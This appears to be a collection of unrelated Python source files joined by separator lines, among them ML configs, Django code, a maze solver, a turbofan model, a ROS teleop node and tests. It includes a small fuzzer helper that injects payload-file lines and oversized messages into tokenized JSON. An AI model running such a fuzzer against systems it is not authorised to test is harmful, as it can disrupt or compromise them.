    def clock(self,clk):
        """Feed a clock level; the count changes only on a 0 -> 1 edge."""
        if self.clk == 0 and clk == 1:
            if self.direction == self.UP:
                self.inc()
            elif self.direction == self.DOWN:
                self.dec()
        self.clk = clk
        return self.count

    def get(self,Q):
        """Return bit Q (0-31) of the count, or 0 for an out-of-range index."""
        if Q < 32 and Q >= 0:
            return self.count >> Q & 1
        else:
            return 0

    def inc(self):
        """Increment and return the count."""
        self.count += 1
        return self.count

    def dec(self):
        """Decrement and return the count.

        Bug fix: the original body incremented here, so DOWN mode counted up.
        """
        self.count -= 1
        return self.count
class Toggle:
    """A one-bit flip-flop holding state 0 or 1."""

    def __init__(self):
        self.state = 0

    def toggle(self):
        """Flip the state and return the new value."""
        self.state = 0 if self.state else 1
        return self.state

    def get(self):
        """Return the current state without changing it."""
        return self.state

    def set(self,state):
        """Force the state: exactly 1 stores 1, anything else stores 0."""
        self.state = 1 if state == 1 else 0
        return self.state
c=Counter()
t=Toggle()
# def count(c):
#     print(c.inc())
# def toggle(t):
#     print(t.toggle())
def displayCount(c, t):
    # Every tick: feed the toggle's output into the counter's clock input
    # (so the count advances on every other tick) and print bit 3.
    c.clock(t.toggle())
    print(c.get(3))
# Fire displayCount every 125 ms until the program is interrupted.
t1 = Repeater(0.125, displayCount, [c, t])
t1.start()
|
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# This work is licensed under the Creative Commons Attribution-NonCommercial
# 4.0 International License. To view a copy of this license, visit
# http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to
# Creative Commons, PO Box 1866, Mountain View, CA 94042, USA.
import dnnlib
import argparse
import sys
import dnnlib.submission.submit as submit
import validation
# Submit config
# ------------------------------------------------------------------------------------------
submit_config = dnnlib.SubmitConfig()
submit_config.run_dir_root = 'results'
submit_config.run_dir_ignore += ['datasets', 'results']
desc = "autoencoder"
# Tensorflow config
# ------------------------------------------------------------------------------------------
tf_config = dnnlib.EasyDict()
tf_config["graph_options.place_pruned_graph"] = True
# Network config
# ------------------------------------------------------------------------------------------
net_config = dnnlib.EasyDict(func_name="network.autoencoder")
# Optimizer config
# ------------------------------------------------------------------------------------------
optimizer_config = dnnlib.EasyDict(beta1=0.9, beta2=0.99, epsilon=1e-8)
# Noise augmentation config
gaussian_noise_config = dnnlib.EasyDict(
    func_name='train.AugmentGaussian',
    train_stddev_rng_range=(0.0,50.0),
    validation_stddev=25.0
)
poisson_noise_config = dnnlib.EasyDict(
    func_name='train.AugmentPoisson',
    lam_max=50.0
)
# ------------------------------------------------------------------------------------------
# Preconfigured validation sets
datasets = {
    'kodak': dnnlib.EasyDict(dataset_dir='datasets/kodak'),
    'bsd300': dnnlib.EasyDict(dataset_dir='datasets/bsd300'),
    'set14': dnnlib.EasyDict(dataset_dir='datasets/Set14/image_SRF_2')
}
default_validation_config = datasets['set14']
# Maps --noise CLI values to their augmentation configs.
corruption_types = {
    'gaussian': gaussian_noise_config,
    'poisson': poisson_noise_config
}
# Train config
# ------------------------------------------------------------------------------------------
train_config = dnnlib.EasyDict(
    iteration_count=300000,
    eval_interval=5000,
    minibatch_size=4,
    run_func_name="train.train",
    learning_rate=0.0003,
    ramp_down_perc=0.3,
    noise=gaussian_noise_config,
    # noise=poisson_noise_config,
    noise2noise=True,
    train_tfrecords='datasets/bsd300.tfrecords',
    validation_config=default_validation_config
)
# Validation run config
# ------------------------------------------------------------------------------------------
validate_config = dnnlib.EasyDict(
    run_func_name="validation.validate",
    dataset=default_validation_config,
    network_snapshot=None,
    noise=gaussian_noise_config
)
# ------------------------------------------------------------------------------------------
# jhellsten quota group
def error(*print_args):
    """Print the given arguments and terminate the process with status 1."""
    print(*print_args)
    raise SystemExit(1)
def str2bool(v):
    """Parse a human-friendly boolean string; raise ArgumentTypeError otherwise."""
    lowered = v.lower()
    if lowered in ('yes', 'true', 't', 'y', '1'):
        return True
    if lowered in ('no', 'false', 'f', 'n', '0'):
        return False
    raise argparse.ArgumentTypeError('Boolean value expected.')
# ------------------------------------------------------------------------------------------
examples='''examples:
# Train a network using the BSD300 dataset:
python %(prog)s train --train-tfrecords=datasets/bsd300.tfrecords
# Run a set of images through a pre-trained network:
python %(prog)s validate --network-snapshot=results/network_final.pickle --dataset-dir=datasets/kodak
'''
if __name__ == "__main__":
    def train(args):
        """Apply CLI overrides to train_config and submit a training run."""
        if args:
            n2n = args.noise2noise if 'noise2noise' in args else True
            train_config.noise2noise = n2n
            if 'long_train' in args and args.long_train:
                # NOTE(review): the --long-train help text promises 500k
                # iterations but 50k is set here -- confirm which is intended.
                train_config.iteration_count = 50000
                train_config.eval_interval = 500
                train_config.ramp_down_perc = 0.5
        else:
            print ('running with defaults in train_config')
        noise = 'gaussian'
        if 'noise' in args:
            if args.noise not in corruption_types:
                error('Unknown noise type', args.noise)
            else:
                noise = args.noise
        train_config.noise = corruption_types[noise]
        # Record the training mode in the run descriptor for bookkeeping.
        if train_config.noise2noise:
            submit_config.run_desc += "-n2n"
        else:
            submit_config.run_desc += "-n2c"
        if 'train_tfrecords' in args and args.train_tfrecords is not None:
            train_config.train_tfrecords = submit.get_path_from_template(args.train_tfrecords)
        print('train_config-------------------')
        print(train_config)
        print()
        dnnlib.submission.submit.submit_run(submit_config, **train_config)
    def validate(args):
        """Run a validation pass of a trained network over a dataset (local only)."""
        if submit_config.submit_target != dnnlib.SubmitTarget.LOCAL:
            print ('Command line overrides currently supported only in local runs for the validate subcommand')
            sys.exit(1)
        if args.dataset_dir is None:
            error('Must select dataset with --dataset-dir')
        else:
            validate_config.dataset = {
                'dataset_dir': args.dataset_dir
            }
        if args.noise not in corruption_types:
            error('Unknown noise type', args.noise)
        validate_config.noise = corruption_types[args.noise]
        if args.network_snapshot is None:
            error('Must specify trained network filename with --network-snapshot')
        validate_config.network_snapshot = args.network_snapshot
        dnnlib.submission.submit.submit_run(submit_config, **validate_config)
    def infer_image(args):
        """Run a single image through a trained network without adding noise."""
        if submit_config.submit_target != dnnlib.SubmitTarget.LOCAL:
            print ('Command line overrides currently supported only in local runs for the validate subcommand')
            sys.exit(1)
        if args.image is None:
            error('Must specify image file with --image')
        if args.out is None:
            error('Must specify output image file with --out')
        if args.network_snapshot is None:
            error('Must specify trained network filename with --network-snapshot')
        # Note: there's no dnnlib.submission.submit_run here. This is for quick interactive
        # testing, not for long-running training or validation runs.
        validation.infer_image(args.network_snapshot, args.image, args.out)
    # Train by default
    parser = argparse.ArgumentParser(
        description='Train a network or run a set of images through a trained network.',
        epilog=examples,
        formatter_class=argparse.RawDescriptionHelpFormatter
    )
    parser.add_argument('--desc', default='', help='Append desc to the run descriptor string')
    parser.add_argument('--run-dir-root', help='Working dir for a training or a validation run. Will contain training and validation results.')
    subparsers = parser.add_subparsers(help='Sub-commands', dest='command')
    parser_train = subparsers.add_parser('train', help='Train a network')
    parser_train.add_argument('--noise2noise', nargs='?', type=str2bool, const=True, default=True, help='Noise2noise (--noise2noise=true) or noise2clean (--noise2noise=false). Default is noise2noise=true.')
    parser_train.add_argument('--noise', default='gaussian', help='Type of noise corruption (one of: gaussian, poisson)')
    parser_train.add_argument('--long-train', default=False, help='Train for a very long time (500k iterations or 500k*minibatch image)')
    parser_train.add_argument('--train-tfrecords', help='Filename of the training set tfrecords file')
    parser_train.set_defaults(func=train)
    parser_validate = subparsers.add_parser('validate', help='Run a set of images through the network')
    parser_validate.add_argument('--dataset-dir', help='Load all images from a directory (*.png, *.jpg/jpeg, *.bmp)')
    parser_validate.add_argument('--network-snapshot', help='Trained network pickle')
    parser_validate.add_argument('--noise', default='gaussian', help='Type of noise corruption (one of: gaussian, poisson)')
    parser_validate.set_defaults(func=validate)
    parser_infer_image = subparsers.add_parser('infer-image', help='Run one image through the network without adding any noise')
    parser_infer_image.add_argument('--image', help='Image filename')
    parser_infer_image.add_argument('--out', help='Output filename')
    parser_infer_image.add_argument('--network-snapshot', help='Trained network pickle')
    parser_infer_image.set_defaults(func=infer_image)
    args = parser.parse_args()
    submit_config.run_desc = desc + args.desc
    print()
    print('args-------------')
    print(args)
    print('****************************')
    print()
    if args.run_dir_root is not None:
        submit_config.run_dir_root = args.run_dir_root
    if args.command is not None:
        args.func(args)
    else:
        # Train if no subcommand was given
        train(args)
|
from django.contrib import admin
from allegro.models import UserProfile, Music, Event, PartFormat, Request
# Expose the allegro app's models in the Django admin with default options.
admin.site.register(UserProfile)
admin.site.register(Music)
admin.site.register(Event)
admin.site.register(PartFormat)
admin.site.register(Request)
|
import pygame, time, random
WINDOW_SIZE = (1000, 1000)
black = (0,0,0)
white = (255,255,255)
green = (0,255,0)
red = (255,0,0)
maze_size = int(input("Size of maze (nxn):"))
# Build a random n x n grid: 0 = open cell (~75%), 1 = wall (~25%).
maze = []
for i in range(0,maze_size):
    maze.append([])
    for j in range(0,maze_size):
        if random.randint(0,3) >= 1:
            maze[i].append(0)
        else:
            maze[i].append(1)
# Force all four corners open so start and goal are reachable cells.
maze[0][0] = 0
maze[0][maze_size-1] = 0
maze[maze_size-1][0] = 0
maze[maze_size-1][maze_size-1] = 0
# Per-step animation delay, shrinking with maze size; off for huge mazes.
delay = 3/maze_size
if (maze_size > 100):
    delay = 0
"""
maze = [[1,0,0,1,0,1,0,1,0,1],
        [1,1,0,1,0,1,0,0,1,0],
        [1,0,0,1,0,0,0,1,0,0],
        [0,0,1,0,0,0,1,0,1,1],
        [1,0,0,0,0,0,1,1,1,1],
        [0,0,1,0,1,1,1,1,1,1],
        [0,1,0,0,1,1,1,1,0,0],
        [0,0,0,1,1,0,0,0,1,0],
        [0,1,0,1,0,0,1,0,0,0],
        [0,1,0,0,0,1,1,1,1,0]]
"""
# Cell edge length in pixels, leaving a 1px grid line between cells.
SQUARE_SIZE = (WINDOW_SIZE[0]-len(maze)-1)/len(maze)
pygame.init()
screen=pygame.display.set_mode(WINDOW_SIZE)
def solve(row,col):
    """Depth-first search from (row, col) toward the bottom-right corner.

    Cell codes in the global `maze`: 0 free, 1 wall, 2 on the current path
    (green), 3 explored dead end (red). Redraws the whole board each call.
    Returns True once the goal cell is reached (or the window is closed).
    """
    if (maze[row][col] == 1):
        return False
    if (maze[row][col] == 2) or (maze[row][col] == 3):
        return False
    maze[row][col] = 2
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            pygame.quit()
            # Returning True unwinds the recursion so the script can exit.
            return True
    # color the board
    screen.fill(white)
    for row_1 in range(0, len(maze)):
        for col_1 in range(0,len(maze[0])):
            if maze[row_1][col_1] == 0:
                pygame.draw.rect(screen, black, [(1 + SQUARE_SIZE) * col_1 + 1, (1 + SQUARE_SIZE) * row_1 + 1, SQUARE_SIZE, SQUARE_SIZE])
            if maze[row_1][col_1] == 2:
                pygame.draw.rect(screen, green, [(1 + SQUARE_SIZE) * col_1 + 1, (1 + SQUARE_SIZE) * row_1 + 1, SQUARE_SIZE, SQUARE_SIZE])
            if maze[row_1][col_1] == 3:
                pygame.draw.rect(screen, red, [(1 + SQUARE_SIZE) * col_1 + 1, (1 + SQUARE_SIZE) * row_1 + 1, SQUARE_SIZE, SQUARE_SIZE])
    pygame.display.flip()
    time.sleep(delay)
    done = False
    if (row == len(maze)-1) and (col == len(maze)-1):
        print("solved")
        done = True;
    # Recurse right, down, left, up until one direction reaches the goal.
    if (col != len(maze)-1) and (not done):
        done = solve(row, col + 1)
    if (row != len(maze)-1) and (not done):
        done = solve(row + 1, col)
    if (col != 0) and (not done):
        done = solve(row, col - 1)
    if (row != 0) and (not done):
        done = solve(row - 1, col)
    if (not done):
        # All four directions failed: mark this cell as a dead end.
        maze[row][col] = 3
    return done
# Start solving from the bottom-left corner, then shut pygame down.
solve(len(maze)-1,0)
pygame.quit()
|
from .model_zoo import get_model
from .model_store import get_model_file
from .base import *
from .fcn import *
from .oc_module import *
from .psp import *
from .encnet import *
from .danet import *
from .resnet101_asp_oc import get_resnet101_asp_oc_dsn
from .resnet101_base_oc import get_resnet101_base_oc_dsn
from .resnet101_baseline import get_resnet101_baseline
from .resnet101_pyramid_oc import get_resnet101_pyramid_oc_dsn
from .emanet import get_emanet
from .galdnet import get_galdnet
from .deeplabv3 import get_deeplabv3
from .deeplabv3plus import get_deeplabv3plus
# from .ccnet import get_ccnet
def get_segmentation_model(name, **kwargs):
    """Look up a segmentation network constructor by (case-insensitive) name
    and build it with the given keyword arguments.

    Raises KeyError for an unknown model name.
    """
    from .fcn import get_fcn
    builders = {
        'fcn': get_fcn,
        'psp': get_psp,
        'encnet': get_encnet,
        'danet': get_danet,
        'asp_oc_dsn': get_resnet101_asp_oc_dsn,
        'base_oc_dsn': get_resnet101_base_oc_dsn,
        'pyramid_oc_dsn': get_resnet101_pyramid_oc_dsn,
        'emanet': get_emanet,
        'galdnet': get_galdnet,
        'deeplabv3': get_deeplabv3,
        'deeplabv3plus': get_deeplabv3plus,
        # 'ccnet': get_ccnet,
    }
    builder = builders[name.lower()]
    return builder(**kwargs)
# Name -> constructor registry for the OC-family ResNet-101 variants.
networks = {
    'resnet101_baseline': get_resnet101_baseline,
    'resnet101_base_oc_dsn': get_resnet101_base_oc_dsn,
    'resnet101_pyramid_oc_dsn': get_resnet101_pyramid_oc_dsn,
    'resnet101_asp_oc_dsn': get_resnet101_asp_oc_dsn,
}
def get_ocsegmentation_model(name, **kwargs):
    # Case-insensitive lookup; raises KeyError for an unknown name.
    return networks[name.lower()](**kwargs)
|
import theano
import theano.tensor as T
# Symbolic double-precision matrix input.
x = T.dmatrix('x')
# Elementwise logistic (sigmoid) expression over x.
s = 1 / (1 + T.exp(-x))
# Compile the expression into a callable: logistic(array) -> array.
logistic = theano.function([x], s)
...
...
|
def rangify(v, lb, ub):
    """Clamp *v* into the interval [lb, ub]; bounds may be given in either order."""
    lo, hi = (ub, lb) if lb >= ub else (lb, ub)
    if v < lo:
        return lo
    if v > hi:
        return hi
    return v
|
"""
Archivo con las partes del turbohélice
Difusor,
"""
from air_model import RealGas
from isentropic_gas import IsentropicGas
import isa
import numpy as np
import generador_gas
# Shared gas-property models used by every component function below.
air = RealGas(cp_option='naca', gamma_option='standard')
gas = IsentropicGas(selected_cp_air_model='naca', selected_gamma_air_model='standard')
# Turbine efficiency function
def rend_turb(x):
    """Turbine efficiency as a function of *x*: 0.88 below 1000, 0.95 above
    2000, linearly interpolated in between."""
    if x < 1000:
        return 0.88
    if x > 2000:
        return 0.95
    return ((x - 1000) * 0.1 / 1000) + 0.88
# Intake diffuser calculation
def difusor(mach, p0, T0):
    """Return the stagnation temperature and pressure (T2t, p2t) at the
    diffuser exit for flight Mach number *mach* and ambient T0 / p0."""
    T2t = gas.stagnation_temperature_from_mach(mach, T0)
    p2t = gas.stagnation_pressure_from_mach(mach, p0, T0)
    return T2t, p2t
# Propeller efficiency function
def rendimiento_helice(mach_i, alt_i):
    """Propeller efficiency at Mach *mach_i* and altitude *alt_i* (m),
    interpolated from a synthetic 12-altitude x 16-Mach table."""
    altitud = []
    rendimientos = np.zeros([12, 16])
    mach = [0, 0.1, 0.2, 0.3, 0.35, 0.4, 0.45, 0.5, 0.55, 0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9]
    # Build one efficiency curve per tabulated altitude (0..11000 m).
    for ii, alt in enumerate(np.linspace(0, 11000, 12)):
        x = np.linspace(0, 1, 16)
        altitud.append(alt)
        # Parabolic shape peaking near x = 0.2, scaled down with altitude index.
        rendimientos[ii] = (- (x - 0.2) ** 2) * (10 - ii) / 10
        rendimientos[ii] = rendimientos[ii] + .95 ** 2 - 0.975 * ii / 11
        rendimientos[ii] = rendimientos[ii] * ((ii + 12) / 11)
    # Efficiency drops to zero at the top tabulated altitude.
    rendimientos[11] = rendimientos[11] * 0
    altitud = np.asarray(altitud)
    # Use the highest tabulated altitude that does not exceed alt_i.
    indice = np.where(altitud <= alt_i)
    return np.interp(mach_i, mach, rendimientos[indice[-1][-1]])
def tubofan(G0, v0, rho0, T0, P0, T2t, T5t, p2t, p4t):
    """Turbofan cycle point: return core and bypass exit velocities (v9, v19)
    and the bypass mass flow, for a fixed bypass ratio of 5.

    NOTE(review): temperature/pressure station numbering (2t, 13t, 45t, 5t)
    follows the usual engine-station convention -- confirm against the
    course notes this model comes from.
    """
    G_secundario = 5 * G0            # bypass mass flow (bypass ratio 5)
    Gtotal = G_secundario + G0
    Afan = G0 / (rho0 * v0)          # capture area from mass flow / (rho * v)
    dfan = np.sqrt(Afan/np.pi*4)     # equivalent fan diameter
    T45t = T5t
    T5_t = (T2t + T45t) * 0.5
    Tturb2 = 0.5*(T45t + T5t)        # mean temperature for gas properties
    p5_t = p4t * (1 + 1 / rend_turb(Tturb2) * (T5_t / T45t - 1)) ** (air.gamma_air(Tturb2) / (air.gamma_air(Tturb2) - 1))
    # Fan exit total temperature from the turbine/fan power balance (1/5 per
    # unit of bypass flow).
    T13t = 1/5 * air.cp_air(Tturb2) * (T45t - T5_t) /air.cp_air(T2t) + T2t
    Tfan = 0.5*(T2t+T13t)
    P13t = p2t * (0.8 * (T13t / T2t - 1) + 1) ** (air.gamma_air(Tfan) / (air.gamma_air(Tfan) - 1))
    Ttob = (T5t + T0) / 2
    Ttob2 = (T13t + T0) / 2
    # Exit velocities from expansion to ambient pressure P0.
    v19 = np.sqrt(2 * air.cp_air(Ttob2)*T13t*(1-(P0/P13t) ** ((air.gamma_air(Ttob2) - 1) / (air.gamma_air(Ttob2)))))
    v9 = np.sqrt(2*air.cp_air(Ttob)*T5_t*(1-(P0/p5_t)**((air.gamma_air(Ttob)-1) / (air.gamma_air(Ttob)))))
    return v9, v19, G_secundario
def actuaciones(G0, v9, v19, v0, G_secundario, c):
    """Engine performance figures.

    Returns (net thrust, specific impulse, specific consumption,
    core thrust, bypass thrust) from the core/bypass mass flows, the exit
    velocities v9/v19, the flight velocity v0 and the fuel flow c.
    """
    core_thrust = G0 * (v9 - v0)
    bypass_thrust = G_secundario * (v19 - v0)
    net_thrust = core_thrust + bypass_thrust
    specific_impulse = net_thrust / G0
    specific_consumption = c / net_thrust
    return net_thrust, specific_impulse, specific_consumption, core_thrust, bypass_thrust
def rendimiento_TB(c, v19, v9, v0, G0, E_primario, E_secundario, G_secundario):
    """Return (thermal, propulsive, overall) efficiencies.

    Kinetic-energy gain of both streams over fuel energy gives eta_m;
    thrust power over kinetic-energy gain gives eta_p; their product is
    the overall efficiency.
    """
    eta_m = (G0 * 0.5 * (v9 ** 2 - v0 ** 2) + G_secundario * 0.5 * (v19 ** 2 - v0 ** 2)) / c / generador_gas.heating_value
    eta_p = (E_primario + E_secundario)*v0 / (G0 * 0.5 * (v9 ** 2 - v0 ** 2) + G_secundario * 0.5 * (v19 ** 2 - v0 ** 2))
    eta_mp = eta_m * eta_p
    return eta_m, eta_p, eta_mp
|
# decision tree model
import pandas as pd
x = pd.read_csv("../../dataset/input_data.csv").to_numpy()
resp = pd.read_csv("../../dataset/output_data.csv").to_numpy()
##
from sklearn.decomposition import PCA
import numpy as np
# Collapse the multi-column response onto its first principal component and
# binarize it (positive projection -> class 1).
pca = PCA(n_components = 1)
resp_pca = pca.fit_transform(resp)
y = (resp_pca > 0).astype("int")
y = np.ravel(y)
##
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.20, random_state = 1)
print("Train size:", y_train.shape[0], "; % trues:", np.sum(y_train)/y_train.shape[0])
print("Test size:", y_test.shape[0], "; % trues:", np.sum(y_test)/y_test.shape[0])
from sklearn.ensemble import AdaBoostClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import accuracy_score
# add gridsearch
DTC = DecisionTreeClassifier()
ABC = AdaBoostClassifier(base_estimator = DTC)
# Grid over base-tree hyperparameters and ensemble size.
params = {"base_estimator__criterion" : ["gini", "entropy"],
          "base_estimator__splitter" : ["best", "random"],
          "n_estimators" : [50, 100, 500]}
# fit model
clf = GridSearchCV(ABC, params)
clf.fit(x_train, y_train)
# grid search results
results= pd.DataFrame.from_dict(clf.cv_results_)
print(results)
results.to_csv("../../results/adaboost_decisiontree.csv") # save as csv file
print("Best model score:", clf.best_score_)
print(clf.best_params_)
# predictions on training set
yhat_train = clf.predict(x_train)
print("Train Accuracy:", accuracy_score(y_train, yhat_train))
# predictions on test set
yhat_test = clf.predict(x_test)
print("Test Accuracy:", accuracy_score(y_test, yhat_test))
|
#!/usr/bin/python3
#coding:utf-8
# 数据集路径: http://grouplens.org/datasets/movielens/1m
import pandas as pd
import os
# 处理数据:将下载的dat文件格式转换成csv格式并保存,方便后续读取.
class Channel:
    """Convert the downloaded MovieLens ``.dat`` files into CSVs for easier
    later loading. Input and output files live in the same directory."""
    def __init__(self, dataDir='./data/'):
        # Directory containing users.dat / ratings.dat / movies.dat.
        self.path = dataDir
    def _process_user_data(self, file='users.dat'):
        """Read the '::'-separated users file and save it as users.csv."""
        fullpath = os.path.join(self.path, file)
        f = pd.read_table(fullpath, sep='::', engine='python',names=['UserID', 'Gender', 'Age', 'Occupation', 'Zip-code'])
        f.to_csv(os.path.join(self.path, 'users.csv'), index=False)
    def _process_ratings_data(self, file='ratings.dat'):
        """Read the '::'-separated ratings file and save it as ratings.csv."""
        fullpath = os.path.join(self.path, file)
        f = pd.read_table(fullpath, sep="::", engine='python',names=['UserID','MovieID','Rating','Timestamp'])
        f.to_csv(os.path.join(self.path, 'ratings.csv'), index=False)
    def _process_movies_data(self, file='movies.dat'):
        """Read the '::'-separated movies file and save it as movies.csv."""
        fullpath = os.path.join(self.path, file)
        f = pd.read_table(fullpath, sep="::", engine='python',names=['MovieID','Title','Genres'])
        f.to_csv(os.path.join(self.path, 'movies.csv'), index=False)
    def process(self):
        """Convert all three data files, printing progress as it goes."""
        print("Process Movies Data...")
        self._process_movies_data()
        print("Moives Done!")
        print("Process Ratings Data...")
        self._process_ratings_data()
        print("Ratings Done!")
        print("Process Users Data...")
        self._process_user_data()
        print("Users Done!")
        print("Done")
if __name__ == '__main__':
    # Convert the MovieLens .dat files under ./data into CSVs.
    ch = Channel('./data')
    ch.process()
# Read the two integers whose factorials will be divided.
first = int(input())
second = int(input())
def factorial(a, b):
    """Return a! / b! as a float (true division, matching the original).

    Uses math.factorial instead of hand-rolled product loops. Note:
    math.factorial raises ValueError for negative inputs, where the old
    loops silently treated any negative value as 0! == 1.
    """
    import math  # local import keeps the module's import surface unchanged
    return math.factorial(a) / math.factorial(b)
# Print first! / second! rounded to two decimal places.
dev = factorial(first, second)
print(f'{dev:.2f}')
|
from django.urls import include, path
from rest_framework.routers import DefaultRouter
from blogs.api import views as qv
router = DefaultRouter()
# /blogs/ list and detail routes come from the viewset's router registration.
router.register(r"blogs", qv.BlogViewSet)
# Comment and like/dislike endpoints are wired explicitly below.
urlpatterns = [
    path("", include(router.urls)),
    path("blogs/<slug:slug>/comments/",
         qv.CommentListAPIView.as_view(),
         name="comments-list"),
    path("blogs/<slug:slug>/comment/",
         qv.CommentCreateAPIView.as_view(),
         name="create-comments"),
    path("comments/<int:pk>/",
         qv.CommentRUDAPIView.as_view(),
         name="comment-detail"),
    path("comments/<int:pk>/like/",
         qv.CommentLikeAPIView.as_view(),
         name="comment-like"),
    path("comments/<int:pk>/dislike/",
         qv.CommentDisLikeAPIView.as_view(),
         name="comment-dislike"),
    path("blogs/<int:pk>/like/",
         qv.BlogLikeAPIView.as_view(),
         name="blog-like"),
    path("blogs/<int:pk>/dislike/",
         qv.BlogDisLikeAPIView.as_view(),
         name="blog-dislike"),
]
from fuzzer.main import PAYLOADS
from tokenizer import TOKEN
from utils.utils import get_max_threads
def generator_from_payload(tokenized_message: str) -> list:
    """Return one message per payload line in the PAYLOADS file, each
    produced by substituting that payload for the token placeholder."""
    message_applied_with_tokens = []
    with open(PAYLOADS, 'r') as f:
        for payload in f:
            message_applied_with_tokens.append(replace_token_in_json(payload, tokenized_message))
    return message_applied_with_tokens
def generator_list_huge_atoms(huge_atom_message: str):
    """Yield the same huge-atom message once per available worker thread."""
    for i in range(get_max_threads()):
        yield huge_atom_message
def replace_token_in_json(payload: str, tokenized_message: str) -> str:
    """Substitute TOKEN in *tokenized_message* with the quote-escaped payload."""
    # Escape double quotes so the payload can sit inside a JSON string value.
    # NOTE(review): backslashes are not escaped first, so payloads containing
    # '\' can still yield invalid JSON -- confirm the payload file is
    # pre-escaped before tightening this.
    escaped_payload = payload.strip().replace('"', '\\"')
    return tokenized_message.replace(TOKEN, escaped_payload)
|
# @Author: aniket
# @Date: 2019-12-17T23:28:30+05:30
# @Last modified by: aniket
# @Last modified time: 2019-12-19T01:30:09+05:30
import roslib
import rospy
from ackermann_msgs.msg import AckermannDriveStamped
from std_msgs.msg import Int16
from ackermann_teleop.msg import cmd
from getkey import getkey, keys
import sys, select, termios, tty
import thread
from numpy import clip
# Friendly key name -> raw character code (hex escapes of ASCII letters).
control_keys = {
    'w' : '\x77',
    's' : '\x73',
    'd' : '\x64',
    'a' : '\x61',
    'space' : '\x20',
    'tab' : '\x09'}
# Raw key code -> (speed delta direction, steering direction) hints.
key_bindings = {
    '\x77' : ( 1.0 , 0.0),
    '\x73' : (-1.0 , 0.0),
    '\x64' : ( 0.0 ,-1.0),
    '\x61' : ( 0.0 , 1.0),
    '\x20' : ( 0.0 , 0.0),
    '\x09' : ( 0.0 , 0.0)}
def servo_pub():
    """Read single keypresses and publish speed/steering commands on 'servo'.

    w/s change speed within [-1, 1]; a/d change steering angle within
    [60, 120] degrees in 30-degree steps; space recenters both; q or
    Ctrl-C exits the loop. Publishes at 10 Hz.
    """
    steering_angle = 90   # neutral steering position (degrees)
    speedy = 0            # stopped
    msg = cmd()
    pub = rospy.Publisher('servo', cmd, queue_size = 5)
    rospy.init_node('servo_pub', anonymous = True)
    rate = rospy.Rate(10)
    while not rospy.is_shutdown():
        key = getkey()
        if key in key_bindings.keys():
            if key == control_keys['s'] and speedy > -1:
                speedy = speedy - 1
            elif key == control_keys['w'] and speedy < 1:
                speedy = speedy + 1
            elif key == control_keys['a'] and steering_angle > 60 :
                steering_angle = steering_angle - 30
            elif key == control_keys['d'] and steering_angle < 120:
                steering_angle = steering_angle + 30
            elif key == control_keys['space']:
                speedy = 0
                steering_angle = 90
        elif key == '\x03' or key == '\x71': # ctr-c or q
            break
        else:
            continue
        msg.speedy = speedy
        msg.steering_angle = steering_angle
        rospy.loginfo(msg)
        pub.publish(msg)
        rate.sleep()
if __name__ == '__main__':
    try:
        servo_pub()
    except rospy.ROSInterruptException:
        # Normal shutdown path when the ROS node is interrupted.
        pass
|
import pytest
from argparse import Namespace
from Bio import Phylo
from math import isclose
from phykit.services.tree.patristic_distances import PatristicDistances
@pytest.fixture
def args():
    """Minimal CLI-args namespace pointing at a dummy tree file."""
    kwargs = dict(tree="/some/path/to/file.tre", verbose=None)
    return Namespace(**kwargs)
class TestPatristicDistances(object):
    """Unit tests for the PatristicDistances tree service."""
    def test_init_sets_tree_file_path(self, args):
        # Constructor copies the tree path and leaves the output path unset.
        t = PatristicDistances(args)
        assert t.tree_file_path == args.tree
        assert t.output_file_path is None
    def test_read_file_reads_tree_file_path(self, mocker, args):
        # read_tree_file delegates to Bio.Phylo.read with newick format.
        mock_read = mocker.patch("phykit.services.tree.base.Phylo.read")
        t = PatristicDistances(args)
        t.read_tree_file()
        mock_read.assert_called_with(args.tree, "newick")
    def test_calculate_patristic_distances(self, tree_simple, args):
        # Summary statistics must match precomputed values for the fixture tree.
        t = PatristicDistances(args)
        patristic_distances, combos, stats = t.calculate_patristic_distances(
            tree_simple
        )
        assert isinstance(stats["mean"], float)
        assert isinstance(stats["median"], float)
        assert isinstance(stats["twenty_fifth"], float)
        assert isinstance(stats["seventy_fifth"], float)
        assert isinstance(stats["standard_deviation"], float)
        assert isinstance(stats["variance"], float)
        assert isinstance(stats["minimum"], float)
        assert isinstance(stats["maximum"], float)
        assert isclose(stats["mean"], 76.19737857142857, rel_tol=0.001)
        assert isclose(stats["median"], 49.588789999999996, rel_tol=0.001)
        assert isclose(stats["twenty_fifth"], 40.50536, rel_tol=0.001)
        assert isclose(stats["seventy_fifth"], 108.13853, rel_tol=0.001)
        assert isclose(stats["standard_deviation"], 45.46979239234539, rel_tol=0.001)
        assert isclose(stats["variance"], 2067.5020202029905, rel_tol=0.001)
        assert isclose(stats["minimum"], 24.0, rel_tol=0.001)
        assert isclose(stats["maximum"], 152.88127, rel_tol=0.001)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
from django.utils.timezone import utc
class Migration(migrations.Migration):
    """Auto-generated migration: rewrites hard-coded DateTimeField defaults
    captured at makemigrations time (2016-12-06)."""
    dependencies = [
        ('goods', '0009_auto_20161206_1510'),
    ]
    operations = [
        migrations.AlterField(
            model_name='bigtype',
            name='create_time',
            field=models.DateTimeField(default=datetime.datetime(2016, 12, 6, 11, 27, 31, 711889, tzinfo=utc)),
        ),
        migrations.AlterField(
            model_name='carouselfigure',
            name='create_time',
            field=models.DateTimeField(default=datetime.datetime(2016, 12, 6, 11, 27, 31, 711210, tzinfo=utc)),
        ),
        migrations.AlterField(
            model_name='goods',
            name='create_time',
            field=models.DateTimeField(default=datetime.datetime(2016, 12, 6, 11, 27, 31, 713709, tzinfo=utc), verbose_name='\u53d1\u5e03\u65f6\u95f4'),
        ),
        migrations.AlterField(
            model_name='goodscollection',
            name='collected_time',
            field=models.DateTimeField(default=datetime.datetime(2016, 12, 6, 11, 27, 31, 715093, tzinfo=utc)),
        ),
        migrations.AlterField(
            model_name='smalltype',
            name='create_time',
            field=models.DateTimeField(default=datetime.datetime(2016, 12, 6, 11, 27, 31, 712742, tzinfo=utc)),
        ),
    ]
|
# -----------------------------------------------------------------------------
import hash_tabla as h
# -----------------------------------------------------------------------------
